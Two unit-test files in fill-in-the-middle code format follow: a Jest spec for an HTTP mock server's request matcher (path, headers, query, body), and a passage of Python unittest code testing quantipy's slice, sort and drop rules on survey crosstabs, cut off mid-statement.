<|file_name|>matcher.spec.js<|end_file_name|><|fim▁begin|>const matcher = require('../lib/matcher'); describe('Matcher', () => { describe('path', () => { let mock; let request; beforeEach(() => { mock = { request: { path: '/test' } }; request = { originalUrl: '/test?blah=test', path: '/test' }; }); test('should return true if request path exactly matches mock request path', () => { expect(matcher.path(mock, request)).toBe(true); }); test('should return true if request path matches mock request greedy path', () => { mock.request.path = '/test/*'; request.path = '/test/anything'; expect(matcher.path(mock, request)).toBe(true); }); test('should return true if request path matches mock request named path', () => { mock.request.path = '/test/:named/end'; request.path = '/test/anything/end'; expect(matcher.path(mock, request)).toBe(true); }); test('should return false if request path does not match mock request named path', () => { mock.request.path = '/test/:named/end'; request.path = '/this/will/never/match'; expect(matcher.path(mock, request)).toBe(false); }); }); describe('headers', () => { let mock; let request; beforeEach(() => { mock = { request: { headers: { test: 'this' } } }; request = { headers: { test: 'this' } }; }); test('should return true if request headers exactly match mock request headers', () => { expect(matcher.headers(mock, request)).toBe(true); }); test('should return true if request headers contain the mock request headers', () => { request.headers.another = 'glah'; expect(matcher.headers(mock, request)).toBe(true); }); test('should return false if request headers do not match the mock request header values', () => { request.headers = { test: 'nope' }; expect(matcher.headers(mock, request)).toBe(false); }); test('should return false if request headers do not contain the mock request header values', () => { request.headers = { another: 'header' }; expect(matcher.headers(mock, request)).toBe(false); }); }); describe('query', () => { let mock; let request; <|fim▁hole|> query: { test: 'this' } } }; request = { query: { test: 'this' } }; }); test('should return true if mock has no query specified', () => { delete mock.request.query; expect(matcher.query(mock, request)).toBe(true); }); test('should return true if mock has empty query specified', () => { delete mock.request.query.test; expect(matcher.query(mock, request)).toBe(true); }); test('should return true if request query exactly match mock request query', () => { expect(matcher.query(mock, request)).toBe(true); }); test('should return true if request query contain the mock request query', () => { request.query.another = 'glah'; expect(matcher.query(mock, request)).toBe(true); }); test('should return false if request query does not match the mock request header values', () => { request.query = { test: 'nope' }; expect(matcher.query(mock, request)).toBe(false); }); test('should return false if request query does not contain the mock request header values', () => { request.query = { another: 'header' }; expect(matcher.query(mock, request)).toBe(false); }); test('RegExp - should return true if request query matches', () => { mock.request.query.email = { type: 'regex', value: '.*?@bar\.com' }; request.query = { test: 'this', email: '[email protected]' }; expect(matcher.query(mock, request)).toBe(true); }); }); describe('body', () => { let mock; let request; beforeEach(() => { mock = { request: { body: { test: 'this' } } }; request = { body: { test: 'this' } }; }); test('should return true if request body exactly match mock 
request body', () => { expect(matcher.body(mock, request)).toBe(true); }); test('should return true if request body contain the mock request body', () => { request.body.another = 'glah'; expect(matcher.body(mock, request)).toBe(true); }); test('should return false if request body does not match the mock request header values', () => { request.body = { test: 'nope' }; expect(matcher.body(mock, request)).toBe(false); }); test('should return false if request body does not contain the mock request header values', () => { request.body = { another: 'field' }; expect(matcher.body(mock, request)).toBe(false); }); }); });<|fim▁end|>
beforeEach(() => { mock = { request: {
<|file_name|>test_rules.py<|end_file_name|><|fim▁begin|>import unittest import os.path import numpy as np import pandas as pd from pandas.util.testing import assert_frame_equal import test_helper import copy from operator import lt, le, eq, ne, ge, gt from pandas.core.index import Index __index_symbol__ = { Index.union: ',', Index.intersection: '&', Index.difference: '~', Index.sym_diff: '^' } from collections import defaultdict, OrderedDict from quantipy.core.stack import Stack from quantipy.core.chain import Chain from quantipy.core.link import Link from quantipy.core.view_generators.view_mapper import ViewMapper from quantipy.core.view_generators.view_maps import QuantipyViews from quantipy.core.view import View from quantipy.core.helpers import functions from quantipy.core.helpers.functions import load_json from quantipy.core.tools.dp.prep import ( frange, frequency, crosstab ) from quantipy.core.tools.view.query import get_dataframe from quantipy.core.dataset import DataSet EXTENDED_TESTS = False COUNTER = 0 class TestRules(unittest.TestCase): def setUp(self): self.path = './tests/' project_name = 'Example Data (A)' # Load Example Data (A) data and meta into self name_data = '%s.csv' % (project_name) path_data = '%s%s' % (self.path, name_data) self.example_data_A_data = pd.DataFrame.from_csv(path_data) name_meta = '%s.json' % (project_name) path_meta = '%s%s' % (self.path, name_meta) self.example_data_A_meta = load_json(path_meta) # Variables by type for Example Data A self.dk = 'Example Data (A)' self.fk = 'no_filter' self.single = ['gender', 'locality', 'ethnicity', 'religion', 'q1'] self.delimited_set = ['q2', 'q3', 'q8', 'q9'] self.q5 = ['q5_1', 'q5_2', 'q5_3'] def test_slicex(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## values meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def _get_dataset(self): meta = self.example_data_A_meta data = self.example_data_A_data dataset = DataSet('rules_test') dataset.set_verbose_infomsg(False) dataset.from_components(data, meta) return dataset def _get_stack_with_links(self, dataset, x=None, y=None, w=None): stack = Stack() stack.add_data(dataset.name, dataset._data, dataset._meta) if not x: x = '@' if not y: y = '@' stack.add_link(x=x, y=y, weights=w) return stack def test_sortx_summaries_mean(self): dataset = self._get_dataset() x = 'q5' y = '@' dataset.sorting(x, on='mean') stack = self._get_stack_with_links(dataset, x) stack.add_link(x=x, y=y, views=['cbase', 'counts', 'c%', 'mean']) vks = ['x|f|x:|||cbase', 'x|f|:|||counts', 'x|f|:|y||c%', 'x|d.mean|x:|||mean'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=[y], rules=True, views=vks, orient_on='x') chain = chains[0] for vk in vks: v = chain['rules_test']['no_filter'][x][y][vk] l = stack['rules_test']['no_filter'][x][y][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) 
self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['q5_4', 'q5_6', 'q5_1', 'q5_3', 'q5_5', 'q5_2'] self.assertEqual(actual_order, expected_order) def test_sortx_summaries_value(self): dataset = self._get_dataset() x = 'q5' y = '@' dataset.sorting(x, on=3, ascending=True) stack = self._get_stack_with_links(dataset, x) stack.add_link(x=x, y=y, views=['cbase', 'counts', 'c%', 'mean']) vks = ['x|f|x:|||cbase', 'x|f|:|||counts', 'x|f|:|y||c%', 'x|d.mean|x:|||mean'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=[y], rules=True, views=vks, orient_on='x') chain = chains[0] for vk in vks: v = chain['rules_test']['no_filter'][x][y][vk] l = stack['rules_test']['no_filter'][x][y][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['q5_4', 'q5_5', 'q5_6', 'q5_1', 'q5_3', 'q5_2'] self.assertEqual(actual_order, expected_order) def test_sortx_summaries_items(self): dataset = self._get_dataset() x = '@' y = 'q5' dataset.sorting(y, on='q5_2', ascending=False) stack = self._get_stack_with_links(dataset, y=y) stack.add_link(x=x, y=y, views=['cbase', 'counts', 'c%', 'mean']) vks = ['x|f|x:|||cbase', 'x|f|:|||counts', 'x|f|:|y||c%', 'x|d.mean|x:|||mean'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=[y], rules=True, views=vks, orient_on='x') chain = chains[0] for vk in vks: v = chain['rules_test']['no_filter'][x][y][vk] l = stack['rules_test']['no_filter'][x][y][vk] if not 'd.mean' in vk and not 'cbase' in vk: check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = [3, 5, 98, 2, 1, 97, 4] self.assertEqual(actual_order, expected_order) def test_sortx_expand_net_within(self): dataset = self._get_dataset() x = 'q2' y = ['@', 'gender'] dataset.sorting(x, on='@', within=True, between=False, fix=98) stack = self._get_stack_with_links(dataset, x=x, y=y) net = [{'test A': [1, 2, 3], 'text': {'en-GB': 'Lab1'}}, {'test B': [5, 6, 97], 'text': {'en-GB': 'Lab2'}}] net_view = ViewMapper().make_template('frequency') view_name = 'expandnet' options = {'logic': net, 'expand': 'after', 'complete': True, 'axis': 'x', 'iterators': {'rel_to': [None, 'y']}} net_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=net_view) vks = ['x|f|x[{1,2,3}+],x[{5,6,97}+]*:|||expandnet', 'x|f|x[{1,2,3}+],x[{5,6,97}+]*:|y||expandnet'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=y, rules=True, views=vks, orient_on='x') chain = chains[0] for yk in y: for vk in vks: v = chain['rules_test']['no_filter'][x][yk][vk] l = stack['rules_test']['no_filter'][x][yk][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['test A', 3, 2, 1, 4, 'test B', 97, 5, 6, 98] self.assertEqual(actual_order, expected_order) def test_sortx_expand_net_between(self): dataset = self._get_dataset() x = 'q2' y = ['@', 'gender'] dataset.sorting(x, on='@', within=False, between=True, ascending=True, fix=98) stack = self._get_stack_with_links(dataset, x=x, y=y) net = [{'test A': [1, 2, 3], 'text': 
{'en-GB': 'Lab1'}}, {'test B': [5, 6, 97], 'text': {'en-GB': 'Lab2'}}] net_view = ViewMapper().make_template('frequency') view_name = 'expandnet' options = {'logic': net, 'expand': 'after', 'complete': True, 'axis': 'x', 'iterators': {'rel_to': [None, 'y']}} net_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=net_view) vks = ['x|f|x[{1,2,3}+],x[{5,6,97}+]*:|||expandnet', 'x|f|x[{1,2,3}+],x[{5,6,97}+]*:|y||expandnet'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=y, rules=True, views=vks, orient_on='x') chain = chains[0] for yk in y: for vk in vks: v = chain['rules_test']['no_filter'][x][yk][vk] l = stack['rules_test']['no_filter'][x][yk][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = [4, 'test B', 5, 6, 97, 'test A', 1, 2, 3, 98] self.assertEqual(actual_order, expected_order) def test_sortx_expand_net_within_between(self): dataset = self._get_dataset() x = 'q2' y = ['@', 'gender'] dataset.sorting(x, on='@', within=True, between=True, ascending=False, fix=98) stack = self._get_stack_with_links(dataset, x=x, y=y) net = [{'test A': [1, 2, 3], 'text': {'en-GB': 'Lab1'}}, {'test B': [5, 6, 97], 'text': {'en-GB': 'Lab2'}}] net_view = ViewMapper().make_template('frequency') view_name = 'expandnet' options = {'logic': net, 'expand': 'after', 'complete': True, 'axis': 'x', 'iterators': {'rel_to': [None, 'y']}} net_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=net_view) test_view = ViewMapper().make_template('coltests') view_name = 'test' options = {'level': 0.2} test_view.add_method(view_name, kwargs=options) stack.add_link(x=x, y=y, views=test_view) vks = ['x|f|x[{1,2,3}+],x[{5,6,97}+]*:|||expandnet', 'x|f|x[{1,2,3}+],x[{5,6,97}+]*:|y||expandnet', 'x|t.props.Dim.20|x[{1,2,3}+],x[{5,6,97}+]*:|||test'] chains = stack.get_chain(data_keys=dataset.name, filters='no_filter', x=[x], y=y, rules=True, views=vks, orient_on='x') chain = chains[0] for yk in y: for vk in vks: v = chain['rules_test']['no_filter'][x][yk][vk] l = stack['rules_test']['no_filter'][x][yk][vk] check_chain_view_dataframe = v.dataframe.reindex_like(l.dataframe) self.assertTrue(check_chain_view_dataframe.equals(l.dataframe)) actual_order = v.dataframe.index.get_level_values(1).tolist() expected_order = ['test A', 3, 2, 1, 'test B', 97, 5, 6, 4, 98] self.assertEqual(actual_order, expected_order) def test_sortx(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## sort_on - default meta['columns'][col_x]['rules'] = {'x': {'sortx': {}}} meta['columns'][col_y]['rules'] = {'y': {'sortx': {}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 15, 12, 3, 11, 14, 6, 8, 10, 9, 5, 4, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 6, 4, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## sort_on - '@' meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'sort_on': '@'}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'sort_on': '@'}}} rules_values_x 
= { 'unwtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 15, 12, 3, 11, 14, 6, 8, 10, 9, 5, 4, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 6, 4, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## fixed meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=True, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## with_weight meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'with_weight': 'weight_b'}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'with_weight': 'weight_b'}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 12, 6, 10, 14, 11, 7, 13, 9, 8]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 3, 15, 4, 5, 16, 12, 6, 10, 14, 11, 7, 13, 9, 8])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 11, 3, 12, 15, 8, 9, 10, 5, 14, 6, 4, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 7, 11, 3, 12, 15, 8, 9, 10, 5, 14, 6, 4, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def test_dropx(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## values meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def test_rules_frequency(self): meta = self.example_data_A_meta data = self.example_data_A_data col = 'religion' ################## slicex meta['columns'][col]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}, 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## sortx 
meta['columns'][col]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}, 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col, all=True, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[1, 3, 15, 5, 16, 10, 12, 14, 11, 7, 13, 8, 9, 6, 2, 4]), 'iswtd': index_items(col, all=True, values=[1, 3, 15, 5, 16, 12, 10, 14, 11, 7, 13, 9, 8, 6, 2, 4])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## dropx meta['columns'][col]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}, 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [1, 2]}}, 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [15, 16]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[4, 5, 6, 10, 12, 11, 7, 13, 8, 9, 1, 2]), 'iswtd': index_items(col, all=True, values=[4, 5, 6, 12, 10, 11, 7, 13, 9, 8, 1, 2])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[10, 12, 14, 11, 7, 13, 8, 9, 15, 16]), 'iswtd': index_items(col, all=True, values=[12, 10, 14, 11, 7, 13, 9, 8, 15, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}, 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[1, 5, 9, 13]), 'iswtd': index_items(col, all=True, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[4, 8, 12, 16]), 'iswtd': index_items(col, all=True, values=[4, 8, 12, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col]['rules'] = { 'x': { 'sortx': {'fixed': [1, 2]}, 'dropx': {'values': [5, 11, 13]}}, 'y': { 'sortx': {'fixed': [15, 16]}, 'dropx': {'values': [7, 13, 14]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[3, 15, 4, 16, 6, 10, 12, 14, 7, 8, 9, 1, 2]), 'iswtd': index_items(col, all=True, values=[3, 15, 4, 16, 6, 12, 10, 14, 7, 9, 8, 1, 2])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[2, 1, 3, 4, 5, 6, 10, 12, 11, 8, 9, 15, 16]), 'iswtd': index_items(col, all=True, values=[2, 1, 3, 4, 5, 6, 12, 10, 11, 9, 8, 15, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) ################## slicex + sortx + dropx meta['columns'][col]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [11, 13]}, 'dropx': {'values': [7]}}, 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [15, 16]}, 'dropx': {'values': [7, 
13]}}} rules_values_x = { 'unwtd': index_items(col, all=True, values=[4, 5, 6, 10, 12, 8, 9, 11, 13]), 'iswtd': index_items(col, all=True, values=[4, 5, 6, 12, 10, 9, 8, 11, 13])} rules_values_y = { 'unwtd': index_items(col, all=True, values=[10, 12, 14, 11, 8, 9, 15, 16]), 'iswtd': index_items(col, all=True, values=[12, 10, 14, 11, 9, 8, 15, 16])} confirm_frequencies( self, meta, data, [None, 'weight_a'], col, rules_values_x, rules_values_y) def test_rules_crosstab(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' ################## slicex + sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [6, 11]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [11, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[5, 10, 12, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=True, values=[5, 12, 10, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[15, 12, 14, 8, 10, 9, 7, 13]), 'iswtd': index_items(col_y, all=True, values=[12, 15, 8, 9, 10, 14, 7, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) if EXTENDED_TESTS: ################## slicex meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': index_items(col_x, all=True, values=[1, 3, 5, 7, 9, 10, 11, 13, 15])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_y, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## sortx meta['columns'][col_x]['rules'] = { 'x': {'sortx': {'fixed': [5, 1, 3]}}} meta['columns'][col_y]['rules'] = { 'y': {'sortx': {'fixed': [6, 2, 4]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 10, 12, 14, 11, 7, 13, 8, 9, 5, 1, 3]), 'iswtd': index_items(col_x, all=True, values=[2, 15, 4, 16, 6, 12, 10, 14, 11, 7, 13, 9, 8, 5, 1, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 16, 7, 15, 12, 3, 11, 14, 8, 10, 9, 5, 13, 6, 2, 4]), 'iswtd': index_items(col_y, all=True, values=[1, 16, 7, 12, 11, 3, 15, 8, 9, 10, 14, 5, 13, 6, 2, 4])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## dropx meta['columns'][col_x]['rules'] = { 'x': {'dropx': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'dropx': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16]), 'iswtd': index_items(col_x, all=True, values=[2, 4, 6, 8, 10, 12, 14, 16])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15]), 'iswtd': index_items(col_y, all=True, values=[1, 3, 5, 7, 9, 11, 13, 15])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## slicex + sortx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 
'sortx': {'fixed': [4, 7, 3]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[5, 6, 10, 12, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=True, values=[5, 6, 12, 10, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[16, 15, 12, 14, 8, 10, 9, 7, 11, 13]), 'iswtd': index_items(col_y, all=True, values=[16, 12, 15, 8, 9, 10, 14, 7, 11, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## slicex + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': [1, 3, 5, 7, 9, 11, 13, 15]}, 'dropx': {'values': [3, 7, 11, 15]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}, 'dropx': {'values': [2, 6, 10, 14]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[1, 5, 9, 13]), 'iswtd': index_items(col_x, all=True, values=[1, 5, 9, 13])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[4, 8, 12, 16]), 'iswtd': index_items(col_y, all=True, values=[4, 8, 12, 16])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) ################## sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [5, 10]}}} meta['columns'][col_y]['rules'] = { 'y': { 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [4, 12]}}} rules_values_x = { 'unwtd': index_items(col_x, all=True, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=True, values=[2, 1, 15, 16, 6, 12, 14, 11, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=True, values=[1, 2, 16, 15, 3, 14, 6, 8, 10, 9, 5, 7, 11, 13]), 'iswtd': index_items(col_y, all=True, values=[1, 2, 16, 3, 15, 8, 9, 10, 14, 5, 6, 7, 11, 13])} confirm_crosstabs( self, meta, data, [None, 'weight_a'], col_x, col_y, rules_values_x, rules_values_y) def test_rules_get_dataframe(self): meta = self.example_data_A_meta data = self.example_data_A_data col_x = 'religion' col_y = 'ethnicity' xks = [col_x] yks = ['@', col_y] test_views = [ 'cbase', 'rbase', # 'ebase', 'counts', 'c%', 'r%', 'mean'] weights = [None, 'weight_a'] ################## slicex + sortx + dropx meta['columns'][col_x]['rules'] = { 'x': { 'slicex': {'values': frange('4-13')}, 'sortx': {'fixed': [4, 7, 3]}, 'dropx': {'values': [6, 11]}}} meta['columns'][col_y]['rules'] = { 'y': { 'slicex': {'values': frange('7-16')}, 'sortx': {'fixed': [7, 11, 13]}, 'dropx': {'values': [11, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[5, 10, 12, 13, 8, 9, 4, 7, 3]), 'iswtd': index_items(col_x, all=False, values=[5, 12, 10, 13, 9, 8, 4, 7, 3])} rules_values_y = { 'unwtd': index_items(col_y, all=False, values=[15, 12, 14, 8, 10, 9, 7, 13]), 'iswtd': index_items(col_y, all=False, values=[12, 15, 8, 9, 10, 14, 7, 13])} stack = get_stack(self, meta, data, xks, yks, test_views, weights, extras=True) confirm_get_dataframe( self, stack, col_x, col_y, rules_values_x, rules_values_y) if EXTENDED_TESTS: ################## slicex meta['columns'][col_x]['rules'] = { 'x': {'slicex': {'values': [1, 3, 5, 7, 9, 10, 11, 13, 15]}}} meta['columns'][col_y]['rules'] = { 'y': {'slicex': {'values': [2, 4, 6, 8, 10, 12, 14, 16]}}} rules_values_x = { 'unwtd': index_items(col_x, all=False, values=[1, 3, 5, 7, 9, 10, 11, 13, 15]), 'iswtd': 
